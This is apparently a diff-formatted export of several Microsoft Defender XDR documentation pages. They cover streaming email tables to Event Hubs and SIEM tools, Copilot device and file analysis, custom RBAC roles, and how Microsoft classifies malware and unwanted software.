-> If you are using an Event Hub Namespace that is **not** part of an Event Hub Cluster, you will only be able to choose up to 10 Event Types (Tables) to export in each Export Settings you define, due to an Azure limitation of 10 Event Hub per Event Hub Namespace.
-
-For example:
--
-If you choose this option, you can skip to the [Configure Microsoft Defender XDR to send email tables](#configure-microsoft-365-defender-to-send-email-tables) section.
-
-Create Event Hubs within your Namespace by selecting **Event Hub** \> **+ Event Hub**.
-
-The Partition Count allows for more throughput via parallelism, so it's recommended to increase this number based on the load you're expecting. Default Message Retention and Capture values of 1 and Off are recommended.
--
-For these Event Hubs (not namespace), you'll need to configure a Shared Access Policy with Send, Listen Claims. Click on your **Event Hub** \> **Shared access policies** \> **+ Add** and then give it a Policy name (not used elsewhere) and check **Send** and **Listen**.
--
-<a name='configure-microsoft-365-defender-to-send-email-tables'></a>
-
-## Configure Microsoft Defender XDR to send email tables
-
-<a name='set-up-microsoft-365-defender-send-email-tables-to-splunk-via-event-hubs'></a>
-
-### Set up Microsoft Defender XDR send Email tables to Splunk via Event Hubs
-
-1. Sign in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> with an account that meets all the following role requirements:
-
- - Contributor role at the Event Hubs *Namespace* Resource level or higher for the Event Hubs that you'll be exporting to. Without this permission, you'll get an export error when you try to save the settings.
-
- - Global Admin or Security Admin Role on the tenant tied to Microsoft Defender XDR and Azure.
-
- :::image type="content" source="../../media/55d5b1c21dd58692fb12a6c1c35bd4fa.png" alt-text="The Settings page of the Microsoft Defender portal" lightbox="../../media/55d5b1c21dd58692fb12a6c1c35bd4fa.png":::
-
-1. Click on **Raw Data Export \> +Add**.
-
- You'll now use the data that you recorded above.
-
- **Name**: This value is local and should be whatever works in your environment.
-
- **Forward events to event hub**: Select this checkbox.
-
- **Event-Hub Resource ID**: This value is the Event Hubs Namespace Resource ID you recorded when you set up the Event Hubs.
-
- **Event-Hub name**: If you created an Event Hubs inside your Event Hubs Namespace, paste the Event Hubs name you recorded above.
-
- If you choose to let Microsoft Defender XDR to create Event Hubs per Event Types (Tables) for you, leave this field empty.
-
- **Event Types**: Select the Advanced Hunting tables that you want to forward to the Event Hubs and then on to your custom app. Alert tables are from Microsoft Defender XDR, Devices tables are from Microsoft Defender for Endpoint (EDR), and Email tables are from Microsoft Defender for Office 365. Email Events records all Email Transactions. The URL (Safe Links), Attachment (Safe Attachments), and Post Delivery Events (ZAP) are also recorded and can be joined to the Email Events on the NetworkMessageId field.
-
- :::image type="content" source="../../media/3b2ad64b6ef0f88cf0175f8d57ef8b97.png" alt-text="The Streaming API settings page in the Microsoft Azure portal" lightbox="../../media/3b2ad64b6ef0f88cf0175f8d57ef8b97.png":::
-
-1. Make sure to click **Submit**.
-
-### Verify that the events are being exported to the Event Hubs
-
-You can verify that events are being sent to the Event Hubs by running a basic Advanced Hunting query. Select **Hunting** \> **Advanced Hunting** \> **Query** and enter the following query:
-
-```console
-EmailEvents
-|join kind=fullouter EmailAttachmentInfo on NetworkMessageId
-|join kind=fullouter EmailUrlInfo on NetworkMessageId
-|join kind=fullouter EmailPostDeliveryEvents on NetworkMessageId
-|where Timestamp > ago(1h)
-|count
-```
-
-This query will show you how many emails were received in the last hour joined across all the other tables. It will also show you if you're seeing events that could be exported to the event hubs. If this count shows 0, then you won't see any data going out to the Event Hubs.
--
-Once you've verified there's data to export, you can view the Event Hubs page to verify that messages are incoming. This process can take up to one hour.
-
-1. In Azure, go to **Event Hub** \> Click on the **Namespace** \> **Event Hub** \> Click on the **Event Hub**.
-1. Under **Overview**, scroll down and in the Messages graph you should see Incoming Messages. If you don't see any results, then there will be no messages
-for your custom app to ingest.
--
-## Related topics
-
-[Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
security Configure Siem Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/configure-siem-defender.md
- Title: Integrate your SIEM tools with Microsoft Defender XDR
-description: Learn how to use REST API and configure supported security information and events management tools to receive and pull detections.
------- m365-security-- tier2- Previously updated : 10/25/2021--
-# Integrate your SIEM tools with Microsoft Defender XDR
--
-**Applies to:**
-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-<a name='pull-microsoft-365-defender-incidents-and-streaming-event-data-using-security-information-and-events-management-siem-tools'></a>
-
-## Pull Microsoft Defender XDR incidents and streaming event data using security information and events management (SIEM) tools
-
-> [!NOTE]
->
-> - [Microsoft Defender XDR Incidents](incident-queue.md) consists of collections of correlated alerts and their evidence.
-> - [Microsoft Defender XDR Streaming API](streaming-api.md) streams event data from Microsoft Defender XDR to event hubs or Azure storage accounts.
-
-Microsoft Defender XDR supports security information and event management (SIEM) tools ingesting information from your enterprise tenant in Microsoft Entra ID using the OAuth 2.0 authentication protocol for a registered Microsoft Entra application representing the specific SIEM solution or connector installed in your environment.
-
-For more information, see:
--- [Microsoft Defender XDR APIs license and terms of use](api-terms.md)-- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Hello World example](api-hello-world.md)-- [Get access with application context](api-create-app-web.md)-
-There are two primary models to ingest security information:
-
-1. Ingesting Microsoft Defender XDR incidents and their contained alerts from a REST API in Azure.
-
-2. Ingesting streaming event data either through Azure Event Hubs or Azure Storage Accounts.
-
-Microsoft Defender XDR currently supports the following SIEM solution integrations:
--- [Ingesting incidents from the incidents REST API](#ingesting-incidents-from-the-incidents-rest-api)-- [Ingesting streaming event data via Event Hub](#ingesting-streaming-event-data-via-event-hubs)-
-## Ingesting incidents from the incidents REST API
-
-### Incident schema
-
-For more information on Microsoft Defender XDR incident properties including contained alert and evidence entities metadata, see [Schema mapping](../defender/api-list-incidents.md#schema-mapping).
-
-### Splunk
-
-Using the new, fully supported Splunk Add-on for Microsoft Security that supports:
--- Ingesting incidents that contain alerts from the following products, which are mapped onto Splunk's Common Information Model (CIM):-
- - Microsoft Defender XDR
- - Microsoft Defender for Endpoint
- - Microsoft Defender for Identity and Microsoft Entra ID Protection
- - Microsoft Defender for Cloud Apps
--- Ingesting Defender for Endpoint alerts (from the Defender for Endpoint's Azure endpoint) and updating these alerts--- Support for updating Microsoft Defender XDR Incidents and/or Microsoft Defender for Endpoint Alerts and the respective dashboards has been moved to the Microsoft 365 App for Splunk.-
-For more information on:
--- The Splunk Add-on for Microsoft Security, see the [Microsoft Security Add-on on Splunkbase](https://splunkbase.splunk.com/app/6207/#/overview)--- The Microsoft 365 App for Splunk, see the [Microsoft 365 App on Splunkbase](https://splunkbase.splunk.com/app/3786/)-
-### Micro Focus ArcSight
-
-The new SmartConnector for Microsoft Defender XDR ingests incidents into ArcSight and maps these onto its Common Event
-Framework (CEF).
-
-For more information on the new ArcSight SmartConnector for Microsoft Defender XDR, see [ArcSight Product Documentation](https://community.microfocus.com/cyberres/productdocs/w/connector-documentation/39246/smartconnector-for-microsoft-365-defender).
-
-The SmartConnector replaces the previous FlexConnector for Microsoft Defender for Endpoint that has been deprecated.
-
-### Elastic
-
-Elastic Security combines SIEM threat detection features with endpoint prevention and response capabilities in one solution.
-The Elastic integration for Microsoft Defender XDR and Defender for Endpoint enables organizations to leverage incidents and alerts from Defender within Elastic Security to perform investigations and incident response. Elastic correlates this data with other data sources, including cloud, network, and endpoint sources using robust detection rules to find threats quickly.
-For more information on the Elastic connector, see: [Microsoft M365 Defender | Elastic docs](https://docs.elastic.co/integrations/m365_defender)
-
-## Ingesting streaming event data via Event Hubs
-
-First you need to stream events from your Microsoft Entra tenant to your Event Hubs or Azure Storage Account. For more information, see [Streaming API](../defender/streaming-api.md).
-
-For more information on the event types supported by the Streaming API, see [Supported streaming event types](../defender/supported-event-types.md).
-
-### Splunk
-
-Use the Splunk Add-on for Microsoft Cloud Services to ingest events from Azure Event Hubs.
-
-For more information on the Splunk Add-on for Microsoft Cloud Services, see the [Microsoft Cloud Services Add-on on Splunkbase](https://splunkbase.splunk.com/app/3110/).
-
-### IBM QRadar
-
-Use the new IBM QRadar Microsoft Defender XDR Device Support Module (DSM) that calls the [Microsoft Defender XDR Streaming API](streaming-api.md) that allows ingesting streaming event data from Microsoft Defender XDR products via Event Hubs or Azure Storage Account. For more information on supported event types, see [Supported event types](supported-event-types.md).
-
-### Elastic
-
-For more information on the Elastic streaming API integration, see [Microsoft M365 Defender | Elastic docs](https://docs.elastic.co/integrations/m365_defender).
-
-## Related articles
-
-[Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
security Copilot In Defender Device Summary https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/copilot-in-defender-device-summary.md
- Title: Summarize device information with Microsoft Copilot in Microsoft Defender
-description: Generate a summary for devices with Microsoft Copilot in Microsoft Defender.
-
- - NOCSH
----
- - m365-security
- - tier1
-
- - MOE150
- - MET150
Previously updated : 04/01/2024--
-# Summarize device information with Microsoft Copilot in Microsoft Defender
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender unified security operations center (SOC) platform-
-[Microsoft Copilot for Security](/security-copilot/microsoft-security-copilot) in the Microsoft Defender portal helps security teams in speeding up device inspection through AI-powered investigation capabilities.
-
-Security operations teams are tasked to sift through device data to find suspicious activities or entities to prevent malicious attacks. These teams need to summarize large amounts of data and simplify complex information to quickly assess, triage, and connect a device's status and activities to potentially malicious attacks.
-
-The device summary capability of Copilot in Defender enables security teams to get a device's security posture, vulnerable software information, and any unusual behaviors. Security analysts can use a device's summary to speed up their investigation of incidents and alerts.
-
-The device summary capability is available in the Microsoft Defender portal through the [Copilot for Security license](/security-copilot/faq-security-copilot). This capability is also available in the Copilot for Security standalone portal through the Microsoft Defender XDR plugin.
-
-## Summarize device information
-
-The device summary generated by Copilot contains noteworthy information about the device, including:
--- The status of important Defender XDR protection capabilities, like attack surface reduction and tamper protection-- Any significant user activity observed, like unusual log in attempts-- A list of vulnerable software installed in the device-- The status of other security features, like firewall settings, that contribute to the device's risk-- Other notable insights that signify the device's status, like when the device was last seen active-- Device insights delivered by Microsoft Intune, like information on the device's primary user, device group, or discovered apps-
-You can access the device summary capability through the following ways:
-
-1. From the main menu, open the Device inventory page by selecting **Devices** under Assets. Choose a device to investigate from the list. Upon opening the device page, Copilot automatically summarizes the device information of the chosen device and displays the summary in the Copilot pane.
-
- :::image type="content" source="../../media/copilot-in-defender/device-summary/copilot-defender-device-summary-device-page-small.png" alt-text="Screenshot of the device summary results in Copilot in Defender." lightbox="../../media/copilot-in-defender/device-summary/copilot-defender-device-summary-device-page.png":::
-
-2. From an incident page, you can choose a device on the incident graph and then select **Device details** (1). On the device pane, select **Summarize** (2) to generate the device summary. The summary is displayed in the Copilot pane.
-
- :::image type="content" source="../../media/copilot-in-defender/device-summary/copilot-defender-device-summary-ΓÇîincident-small.png" alt-text="Screenshot highlighting the steps to access the device summary in an incident page in Copilot in Defender." lightbox="../../media/copilot-in-defender/device-summary/copilot-defender-device-summary-ΓÇîincident.png":::
-
- You can also access the device summary capability by choosing a device listed in the **Assets** tab of an incident. Select **Copilot** in the device pane to generate the device summary.
-
- :::image type="content" source="../../media/copilot-in-defender/device-summary/copilot-defender-device-summary-assets-small.png" alt-text="Screenshot highlighting the device summary option in the assets tab of an incident page in Copilot in Defender." lightbox="../../media/copilot-in-defender/device-summary/copilot-defender-device-summary-assets.png":::
-
-Review the results. You can copy the results to clipboard, regenerate the results, or open the Copilot for Security portal by selecting the More actions ellipsis (...) on top of the device summary card.
-
-You can provide feedback about the results by navigating to the bottom of the Copilot pane and selecting the feedback icon ![Screenshot of the feedback icon for Copilot in Defender cards](../../media/copilot-in-defender/copilot-defender-feedback.png).
-
-## See also
--- [Run script analysis](security-copilot-m365d-script-analysis.md)-- [Analyze files](copilot-in-defender-file-analysis.md)-- [Summarize an incident](security-copilot-m365d-incident-summary.md)-- [Resolve incidents with guided responses](security-copilot-m365d-guided-response.md)-- [Get started with Copilot for Security](/security-copilot/get-started-security-copilot)-- [Learn about other Copilot for Security embedded experiences](/security-copilot/experiences-security-copilot)-- [Know more about preinstalled plugins in Microsoft Copilot for Security](/security-copilot/manage-plugins#preinstalled-plugins)-
security Copilot In Defender File Analysis https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/copilot-in-defender-file-analysis.md
- Title: Analyze files with Microsoft Copilot in Microsoft Defender
-description: Analyze files with Microsoft Copilot in Microsoft Defender.
-
- - NOCSH
----
- - m365-security
- - tier1
-
- - MOE150
- - MET150
Previously updated : 04/01/2024--
-# File analysis with Microsoft Copilot in Microsoft Defender
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender unified security operations center (SOC) platform-
-[Microsoft Copilot for Security](/security-copilot/microsoft-security-copilot) in the Microsoft Defender portal enables security teams to quickly identify malicious and suspicious files through AI-powered file analysis capabilities.
-
-Security operations teams tracking and resolving attacks need tools and techniques to quickly analyze potentially malicious files. Sophisticated attacks often use files that mimic legitimate or system files to avoid detection. In addition, new-to-the-field security analysts might require time and gain significant experience to use available analysis tools and techniques.
-
-The file analysis capability of Copilot in Defender reduces the barrier to learning file analysis by immediately delivering reliable and complete file investigation results. This capability empowers security analysts from all levels to complete their investigation with a shorter turnaround time. The report includes an overview of the file, details of the file's contents, and a summary of the file's assessment.
-
-The file analysis capability is available in Microsoft Defender through the [Copilot for Security license](/security-copilot/faq-security-copilot). Copilot for Security standalone portal users also have the file analysis capability and other Defender XDR capabilities through the Microsoft Defender XDR plugin.
-
-## Analyze a file
-
-The file analysis results generated by Copilot usually contains the following information:
--- **Overview** - contains an assessment of the file, including a detection name when the file is malicious/potentially unwanted, important file information like certificates and signer, and a summary of the contents of the file that contributes to the assessment.-- **Details** - highlights *Strings* found in the file, lists *API calls* that the file uses, and lists information of the file's relevant *Certificates*.-
-> [!NOTE]
-> The analysis results vary depending on the contents of the file.
-
-You can access the file analysis capability through the following ways:
-
-1. Open a file page. Copilot automatically generates an analysis upon opening a file page. The results, which shows the overview information by default, are then displayed on the Copilot pane.
- :::image type="content" source="../../media/copilot-in-defender/file-analysis/copilot-defender-file-analysis-small.png" alt-text="Screenshot of the file analysis results in Copilot in Defender with the Show details option highlighted." lightbox="../../media/copilot-in-defender/file-analysis/copilot-defender-file-analysis.png":::
- Select **Show details** (shown above) to display the full results or **Hide details** (highlighted below) to minimize the results.
- :::image type="content" source="../../media/copilot-in-defender/file-analysis/copilot-defender-file-analysis-hide-small.png" alt-text="Screenshot of the file analysis results in Copilot in Defender with the Hide details option highlighted." lightbox="../../media/copilot-in-defender/file-analysis/copilot-defender-file-analysis-hide.png":::
-2. From an incident page, choose a file to investigate in the [attack story](investigate-incidents.md#attack-story) graph. You can also choose a file to investigate in an alert page.
- :::image type="content" source="../../media/copilot-in-defender/file-analysis/copilot-defender-file-analysis-attack-story-small.png" alt-text="Screenshot of the attack story graph with the file entities highlighted." lightbox="../../media/copilot-in-defender/file-analysis/copilot-defender-file-analysis-attack-story.png":::
- Select a file to investigate then select **Analyze** on the side pane to begin analysis. The results are then displayed on the Copilot pane.
- :::image type="content" source="../../media/copilot-in-defender/file-analysis/copilot-defender-file-analysis-file-pane-small.png" alt-text="Screenshot of the incident page with the file analysis button highlighted." lightbox="../../media/copilot-in-defender/file-analysis/copilot-defender-file-analysis-file-pane.png":::
-
-You can copy the results to clipboard, regenerate the results, or open the Copilot for Security portal by selecting the More actions ellipsis (...) on top of the file analysis card.
-
-Always review the results generated by Copilot in Defender. Select the feedback icon ![Screenshot of the feedback icon for Copilot in Defender cards](../../media/copilot-in-defender/copilot-defender-feedback.png) at the bottom of the Copilot pane to provide feedback.
-
-## See also
--- [Run script analysis](security-copilot-m365d-script-analysis.md)-- [Summarize an incident](security-copilot-m365d-incident-summary.md)-- [Generate device summary](copilot-in-defender-device-summary.md)-- [Resolve incidents with guided responses](security-copilot-m365d-guided-response.md)-- [Get started with Copilot for Security](/security-copilot/get-started-security-copilot)-- [Know more about preinstalled plugins in Microsoft Copilot for Security](/security-copilot/manage-plugins#preinstalled-plugins)-- [Learn about other Copilot for Security embedded experiences](/security-copilot/experiences-security-copilot)-
security Create Custom Rbac Roles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/create-custom-rbac-roles.md
- Title: Create custom roles with Microsoft Defender XDR Unified role-based access control (RBAC)
-description: Create custom roles in Microsoft Defender XDR Security portal role-based access control (RBAC)
------- m365-security-- tier3-- Previously updated : 08/03/2023---
-# Create custom roles with Microsoft Defender XDR Unified RBAC
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Identity](https://go.microsoft.com/fwlink/?LinkID=2198108)-- [Microsoft Defender for Office 365 P2](https://go.microsoft.com/fwlink/?LinkID=2158212)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction)-
-## Create a custom role
-
-The following steps guide you on how to create custom roles in Microsoft Defender XDR Unified RBAC.
-
-> [!IMPORTANT]
-> You must be a Global Administrator or Security Administrator in Microsoft Entra ID, or have all the **Authorization** permissions assigned in Microsoft Defender XDR Unified RBAC to perform this task. For more information on permissions, see [Permission pre-requisites](../defender/manage-rbac.md#permissions-pre-requisites).
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com).
-2. In the navigation pane, select **Permissions**.
-3. Select **Roles** under Microsoft Defender XDR to get to the Permissions and roles page.
-4. Select **Create custom role**.
-5. Enter the Role name and description.
-6. Select **Next** to choose the permissions you want to assign. Permissions are organized in three different categories:
-
- :::image type="content" source="../../media/defender/m365-defender-rbac-permissions1.png" alt-text="Screenshot of the permissions screen" lightbox="../../media/defender/m365-defender-rbac-permissions1.png":::
-
-7. Select a permission category (for example, Security operations), and then review the permissions available. You can choose to assign the following different levels of permissions:
- - Select all read-only permissions ΓÇô Users will be assigned with all the read-only permissions in this category.
- - Select all read and manage permissions ΓÇô Users will be assigned all permissions in this category (read and manage permissions).
- - Select custom permissions ΓÇô Users will be assigned the custom permissions selected.
-
- :::image type="content" source="../../media/defender/m365-defender-rbac-assignments-fig.png" alt-text="Screenshot of the permissions flyout screen" lightbox="../../media/defender/m365-defender-rbac-assignments-fig.png":::
-
- For more information on the RBAC custom permissions, see [About RBAC custom permissions](custom-permissions-details.md).
-
- > [!NOTE]
- > If all read-only or all read and manage permissions are assigned, any new permissions added to this category in the future will be automatically assigned under this role.
- >
- > If you have assigned custom permissions and new permissions are added to this category, you will need to re-assign your roles with the new permissions if needed.
-
-8. Once you have selected your permissions, select **Apply** and then **Next** to assign users and data sources.
-9. Select **Add assignments** and Enter the Assignment name.
-10. Under **data sources**, choose if the assigned users will have the selected permissions across all the available products, or only for specific data sources:
-
- :::image type="content" source="../../media/defender/m365-defender-rbac-assignments.png" alt-text="Screenshot of the assignments screen" lightbox="../../media/defender/m365-defender-rbac-assignments.png":::
-
- If a user selects all read-only permissions for a single data source, for example, Microsoft Defender for Endpoint, they will not be able to read alerts for Microsoft Defender for Office 365 or Microsoft Defender for Identity.
-
- > [!NOTE]
- > By selecting **Choose all data sources** all supported data sources within Microsoft Defender XDR Unified RBAC and any future data sources that are added will be automatically assigned to this assignment.
-
-11. In **Assigned users and groups** choose the Microsoft Entra security groups or individual users to assign the role to, and select **Add**.
-
- > [!NOTE]
- > In Microsoft Defender XDR Unified RBAC, you can create as many assignments as needed under the same role with same permissions. For example, you can have an assignment within a role that has access to all data sources and then a separate assignment for a team that only needs access to Endpoint alerts from the Defender for Endpoint data source. This enables maintaining the minimum number of roles.
-
-12. Select **Next** to review and finish creating the role and then select **Submit**.
-
-## Create a role to access and manage roles and permissions
-
-To access and manage roles and permissions, without being a Global Administrator or Security Administrator in Microsoft Entra ID, you need to create a role with **Authorization** permissions. To create this role:
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com) as Global Administrator or Security Administrator.
-2. In the navigation pane, select **Permissions**.
-3. Select **Roles** under Microsoft Defender XDR.
-4. Select **Create custom role**.
-5. Enter the Role name and description.
-6. Select **Next** and choose the **Authorization and settings** option.
-7. On the Authorization and settings category flyout, choose **Select custom permissions** and under **Authorization** select either:
- - Select all permissions - users will be able to create and manage roles and permissions.
- - Read-only - uses will be able to access and view roles and permissions in a read-only mode.
-
- :::image type="content" source="../../media/defender/m365-defender-rbac-authorization-role.png" alt-text="Screenshot of the permissions and roles page" lightbox="../../media/defender/m365-defender-rbac-authorization-role.png":::
-
-8. Select **Apply** and then **Next** to assign users and data sources.
-9. Select **Add assignments** and enter the Assignment name.
-10. To choose the **data sources** users assigned the Authorization permission will have access to:
-
- - Select **Choose all data sources** to grant users permissions to create new roles and manage roles for all data sources.
- - Select **Select specific data sources** to grant users permissions to create new roles and manage roles for a specific data source. For example, select Microsoft Defender for Endpoint from the dropdown to grant users the Authorization permission for the Microsoft Defender for Endpoint data source only.
-
-11. In **Assigned users and groups** ΓÇô choose the Microsoft Entra security groups or individual users to assign the role to, and select **Add**.
-12. Select **Next** to review and finish creating the role and then select **Submit**.
-
-> [!NOTE]
-> For the Microsoft Defender XDR security portal to start enforcing the permissions and assignments configured in your new or imported roles, you'll need to activate the new Microsoft Defender XDR Unified RBAC model. For more information, see [Activate Microsoft Defender XDR Unified RBAC](activate-defender-rbac.md).
-
-## Next steps
--- [Import existing RBAC roles](import-rbac-roles.md)-- [Activate Microsoft Defender XDR Unified RBAC](activate-defender-rbac.md)
security Criteria https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/criteria.md
- Title: How Microsoft identifies malware and potentially unwanted applications-
-description: Learn how Microsoft reviews software for privacy violations and other negative behavior, to determine if it's malware or a potentially unwanted application.
------- m365-security-- tier2- Previously updated : 12/13/2021--
-# How Microsoft identifies malware and potentially unwanted applications
-
-Microsoft aims to provide a delightful and productive Windows experience by working to ensure you're safe and in control of your devices. Microsoft helps protect you from potential threats by identifying and analyzing software and online content. When you download, install, and run software, we check the reputation of downloaded programs and ensure you're protected against known threats. You are also warned about software that is unknown to us.
-
-You can assist Microsoft by [submitting unknown or suspicious software for analysis](https://www.microsoft.com/wdsi/filesubmission/). This will help ensure that unknown or suspicious software is scanned by our system to start establishing reputation. [Learn more about submitting files for analysis](submission-guide.md)
-
-The next sections provide an overview of the classifications we use for applications and the types of behaviors that lead to that classification.
-
-> [!NOTE]
-> New forms of malware and potentially unwanted applications are being developed and distributed rapidly. The following list may not be comprehensive, and Microsoft reserves the right to adjust, expand, and update these without prior notice or announcement.
-
-## Unknown ΓÇô Unrecognized software
-
-No antivirus or protection technology is perfect. It takes time to identify and block malicious sites and applications, or trust newly released programs and certificates. With almost 2 billion websites on the internet and software continuously updated and released, it's impossible to have information about every single site and program.
-
-Think of Unknown/Uncommonly downloaded warnings as an early warning system for potentially undetected malware. There's generally a delay from the time new malware is released until it's identified. Not all uncommon programs are malicious, but the risk in the unknown category is much higher for the typical user. Warnings for unknown software aren't blocks. Users can choose to download and run the application normally if they wish to.
-
-Once enough data is gathered, Microsoft's security solutions can make a determination. Either no threats are found, or an application or software is categorized as malware or potentially unwanted software.
-
-## Malware
-
-Malware is the overarching name for applications and other code, like software, that Microsoft classifies more granularly as *malicious software* or *unwanted software*.
-
-### Malicious software
-
-Malicious software is an application or code that compromises user security. Malicious software may steal your personal information, lock your device until you pay a ransom, use your device to send spam, or download other malicious software. In general, malicious software wants to trick, cheat, or defrauds users, placing them in vulnerable states.
-
-Microsoft classifies most malicious software into one of the following categories:
-
-* **Backdoor:** A type of malware that gives malicious hackers remote access to and control of your device.
-
-* **Command and Control:** A type of malware that infects your device and establishes communication with the hackers' command-and-control server to receive instructions. Once communication is established, hackers can send commands that can steal data, shut down and reboot the device, and disrupt web services.
-
-* **Downloader:** A type of malware that downloads other malware onto your device. It must connect to the internet to download files.
-
-* **Dropper:** A type of malware that installs other malware files onto your device. Unlike a downloader, a dropper doesn't have to connect to the internet to drop malicious files. The dropped files are typically embedded in the dropper itself.
-
-* **Exploit:** A piece of code that uses software vulnerabilities to gain access to your device and perform other tasks, such as installing malware..
-
-* **Hacktool:** A type of tool that can be used to gain unauthorized access to your device.
-
-* **Macro virus:** A type of malware that spreads through infected documents, such as Microsoft Word or Excel documents. The virus is run when you open an infected document.
-
-* **Obfuscator:** A type of malware that hides its code and purpose, making it more difficult for security software to detect or remove.
-
-* **Password stealer:** A type of malware that gathers your personal information, such as usernames and passwords. It often works along with a keylogger, which collects and sends information about the keys you press and websites you visit.
-
-* **Ransomware:** A type of malware that encrypts your files or makes other modifications that can prevent you from using your device. It then displays a ransom note that states you must pay money or perform other actions before you can use your device again. [See more information about ransomware](/security/ransomware/human-operated-ransomware).
-
-* **Rogue security software:** Malware that pretends to be security software but doesn't provide any protection. This type of malware usually displays alerts about nonexistent threats on your device. It also tries to convince you to pay for its services.
-
-* **Trojan:** A type of malware that attempts to appear harmless. Unlike a virus or a worm, a trojan doesn't spread by itself. Instead, it tries to look legitimate to tricks users into downloading and installing it. Once installed, trojans perform various malicious activities such as stealing personal information, downloading other malware, or giving attackers access to your device.
-
-* **Trojan clicker:** A type of trojan that automatically clicks buttons or similar controls on websites or applications. Attackers can use this trojan to click on online advertisements. These clicks can skew online polls or other tracking systems and can even install applications on your device.
-
-* **Worm:** A type of malware that spreads to other devices. Worms can spread through email, instant messaging, file sharing platforms, social networks, network shares, and removable drives. Sophisticated worms take advantage of software vulnerabilities to propagate.
-
-### Unwanted software
-
-Microsoft believes that you should have control over your Windows experience. Software running on Windows should keep you in control of your device through informed choices and accessible controls. Microsoft identifies software behaviors that ensure you stay in control. We classify software that doesn't fully demonstrate these behaviors as "unwanted software".
-
-#### Lack of choice
-
-You must be notified about what is happening on your device, including what software does and whether it's active.
-
-Software that exhibits lack of choice might:
-
-* Fail to provide prominent notice about the behavior of the software and its purpose and intent.
-
-* Fail to clearly indicate when the software is active. It might also attempt to hide or disguise its presence.
-
-* Install, reinstall, or remove software without your permission, interaction, or consent.
-
-* Install other software without a clear indication of its relationship to the primary software.
-
-* Circumvent user consent dialogs from the browser or operating system.
-
-* Falsely claim to be software from Microsoft.
-
-Software must not mislead or coerce you into making decisions about your device. It is considered behavior that limits your choices. In addition to the previous list, software that exhibits lack of choice might:
-
-* Display exaggerated claims about your device's health.
-
-* Make misleading or inaccurate claims about files, registry entries, or other items on your device.
-
-* Display claims in an alarming manner about your device's health and require payment or certain actions in exchange for fixing the purported issues.
-
-Software that stores or transmits your activities or data must:
-
-* Give you notice and get consent to do so. Software shouldn't include an option that configures it to hide activities associated with storing or transmitting your data.
-
-#### Lack of control
-
-You must be able to control software on your device. You must be able to start, stop, or otherwise revoke authorization to software.
-
-Software that exhibits lack of control might:
-
-* Prevent or limit you from viewing or modifying browser features or settings.
-
-* Open browser windows without authorization.
-
-* Redirect web traffic without giving notice and getting consent.
-
-* Modify or manipulate webpage content without your consent.
-
-Software that changes your browsing experience must only use the browser's supported extensibility model for installation, execution, disabling, or removal. Browsers that don't provide supported extensibility models are considered non-extensible and shouldn't be modified.
-
-#### Installation and removal
-
-You must be able to start, stop, or otherwise revoke authorization given to software. Software should obtain your consent before installing, and it must provide a clear and straightforward way for you to install, uninstall, or disable it.
-
-Software that delivers *poor installation experience* might bundle or download other "unwanted software" as classified by Microsoft.
-
-Software that delivers *poor removal experience* might:
-
-* Present confusing or misleading prompts or pop-ups when you try to uninstall it.
-
-* Fail to use standard install/uninstall features, such as Add/Remove Programs.
-
-#### Advertising and advertisements
-
-Software that promotes a product or service outside of the software itself can interfere with your computing experience. You should have clear choice and control when installing software that presents advertisements.
-
-The advertisements that are presented by software must:
-
-* Include an obvious way for users to close the advertisement. The act of closing the advertisement must not open another advertisement.
-
-* Include the name of the software that presented the advertisement.
-
-The software that presents these advertisements must:
-
-* Provide a standard uninstall method for the software using the same name as shown in the advertisement it presents.
-
-Advertisements shown to you must:
-
-* Be distinguishable from website content.
-
-* Not mislead, deceive, or confuse.
-
-* Not contain malicious code.
-
-* Not invoke a file download.
-
-#### Consumer opinion
-
-Microsoft maintains a worldwide network of analysts and intelligence systems where you can [submit software for analysis](https://www.microsoft.com/wdsi/filesubmission). Your participation helps Microsoft identify new malware quickly. After analysis, Microsoft creates Security intelligence for software that meets the described criteria. This Security intelligence identifies the software as malware and are available to all users through Microsoft Defender Antivirus and other Microsoft antimalware solutions.
-
-## Potentially unwanted application (PUA)
-
-Our PUA protection aims to safeguard user productivity and ensure enjoyable Windows experiences. This protection helps deliver more productive, performant, and delightful Windows experiences. For instruction on how to enable PUA protection in Chromium-based Microsoft Edge and Microsoft Defender Antivirus, see [Detect and block potentially unwanted applications](/microsoft-365/security/defender-endpoint/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus).
-
-*PUAs are not considered malware.*
-
-Microsoft uses specific categories and the category definitions to classify software as a PUA.
-
-* **Advertising software:** Software that displays advertisements or promotions, or prompts you to complete surveys for other products or services in software other than itself. This includes software that inserts advertisements to webpages.
-
-* **Torrent software (Enterprise only):** Software that is used to create or download torrents or other files specifically used with peer-to-peer file-sharing technologies.
-
-* **Cryptomining software (Enterprise only):** Software that uses your device resources to mine cryptocurrencies.
-
-* **Bundling software:** Software that offers to install other software that is not developed by the same entity or not required for the software to run. Also, software that offers to install other software that qualifies as PUA based on the criteria outlined in this document.
-
